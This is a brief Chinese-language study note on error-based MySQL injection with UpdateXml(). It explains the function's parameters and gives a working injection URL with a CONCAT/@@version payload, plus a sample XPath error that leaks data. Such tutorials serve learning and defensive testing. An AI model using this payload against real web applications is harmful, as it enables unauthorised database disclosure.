學習筆記 UpdateXml() MYSQL顯錯注入

標籤：mysq   sel   文法   document   作用   對象   host   第一個   date   

在學習之前,需要先瞭解 UpdateXml() 。

UPDATEXML (XML_document, XPath_string, new_value); 
第一個參數：XML_document是String格式，為XML文檔對象的名稱，文中為Doc 
第二個參數：XPath_string (Xpath格式的字串) ，如果不瞭解Xpath文法，可以在網上尋找教程。 
第三個參數：new_value，String格式，替換尋找到的合格資料 
作用：改變文檔中合格節點的值

然後咱們再看看語句：

http://www.XXXIII.com/a.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

CONCAT(str1,str2,…)  

返回結果為串連參數產生的字串。如有任何一個參數為NULL ，則傳回值為 NULL。

通過查詢@@version,返回版本。然後CONCAT將其字串化。因為UPDATEXML第二個參數需要Xpath格式的字串,所以不符合要求，然後報錯。

錯誤大概會是：

ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

不懂Xpath格式的字串的來這裡：http://www.cnblogs.com/Loofah/archive/2012/05/10/2494036.html

學習筆記 UpdateXml() MYSQL顯錯注入